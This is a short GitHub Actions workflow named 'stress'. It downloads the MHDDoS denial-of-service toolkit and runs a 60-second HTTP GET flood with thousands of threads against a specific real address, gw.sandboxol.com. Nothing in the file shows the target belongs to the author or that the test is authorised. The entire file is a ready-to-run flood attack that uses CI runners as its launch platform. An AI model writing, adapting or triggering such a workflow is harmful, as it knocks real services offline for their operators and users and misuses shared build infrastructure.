name: stress
on: workflow_dispatch
jobs:
  stress:
    runs-on: ubuntu-24.04-arm
    steps:
      - run: |
          git clone https://github.com/MatrixTM/MHDDoS.git
          cd MHDDoS
          pip install -r requirements.txt
          mkdir -p files/proxies && touch files/proxies/all.txt
          python start.py GET http://gw.sandboxol.com/server-time 0 2500 all.txt 2500 60 true
